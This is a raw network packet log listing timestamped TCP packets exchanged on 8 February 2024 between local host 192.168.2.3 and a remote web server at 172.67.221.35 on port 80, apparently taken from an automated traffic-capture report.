                                                                                                                                                                    Feb 8, 2024 19:08:49.530541897 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.530554056 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.530565023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.530575991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.530584097 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.530591965 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.530622959 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.531310081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.531385899 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.531399012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.531409025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.531420946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.531424046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.531445026 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.532121897 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.532135963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.532146931 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.532169104 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.532188892 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.532190084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.532202005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.532244921 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.533102036 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.533113956 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.533124924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.533137083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.533149958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.533150911 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.533185959 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.535291910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.535305023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.535315990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.535327911 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.535340071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.535342932 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.535953045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.535953045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556248903 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556323051 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556339025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556353092 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556368113 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556380987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556382895 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556423903 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556485891 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556723118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556794882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556808949 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556823015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556834936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556839943 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556848049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.556866884 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.556889057 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.557678938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557776928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557809114 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557821989 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557833910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557852983 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.557854891 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.557873011 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.557900906 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.558701992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558717012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558731079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558743954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558758020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558772087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.558780909 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.558819056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.559640884 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559655905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559668064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559681892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559695959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559709072 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.559716940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.559747934 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.560621023 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560642004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560653925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560666084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560681105 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560692072 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.560704947 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.560739040 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.561428070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561441898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561454058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561466932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561480045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561481953 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.561494112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.561505079 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.561528921 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.562419891 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562433004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562446117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562458992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562473059 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562484026 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.562488079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.562503099 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.562541962 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.563292980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563306093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563318014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563328981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563355923 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.563384056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.563390017 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563404083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.563448906 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.564232111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564246893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564294100 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564295053 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.564317942 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564357996 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.564359903 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564373970 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.564409971 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.565134048 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565203905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565216064 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565229893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565243006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565246105 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.565256119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.565274000 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.565309048 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.566030025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566046000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566106081 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.566118002 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566133022 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566144943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566157103 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.566174984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.566199064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.566993952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567008972 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567022085 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567034006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567049026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567061901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567061901 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.567081928 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.567110062 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.567846060 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567863941 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567878008 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567890882 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567904949 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567917109 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.567924023 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.567961931 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.568720102 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.568733931 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.568798065 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.568998098 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569011927 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569051027 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569057941 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.569065094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569077015 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569088936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569102049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.569122076 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.569892883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569955111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569969893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569983006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569998026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.569998980 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.570013046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570020914 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.570050001 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.570790052 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570804119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570816040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570830107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570842981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570856094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.570868015 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.570902109 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.571696997 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571712017 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571726084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571738958 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571753025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571765900 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.571775913 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.571806908 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.572526932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572540998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572554111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572566986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572580099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572592020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.572613001 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.572638035 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.573380947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573395967 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573409081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573422909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573435068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573438883 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.573447943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.573462009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.573502064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.574244976 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574258089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574270964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574284077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574297905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574311972 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.574314117 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.574332952 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.574361086 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.574996948 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575097084 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575109959 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575122118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575134039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575141907 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.575148106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575164080 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.575193882 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.575845957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575932026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575944901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575958014 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575970888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575975895 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.575984001 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.575997114 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.576025009 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.576739073 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576752901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576816082 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.576889992 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576904058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576915026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576929092 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576941013 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.576942921 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.576971054 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.577644110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577681065 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577693939 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577697039 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.577740908 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.577754021 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577768087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577780008 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577792883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.577802896 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.577831984 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.578593016 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578624964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578649044 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578660965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578668118 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.578700066 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578701973 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.578711987 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578722954 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.578761101 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.579601049 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579616070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579626083 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579638004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579652071 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.579683065 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.579699039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579710960 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579721928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.579735994 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.579761982 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.580521107 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580555916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580569029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580600023 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.580620050 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580632925 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580643892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580653906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.580662012 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.580687046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:49.581490993 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:49.581557035 CET4971780192.168.2.3172.67.221.35
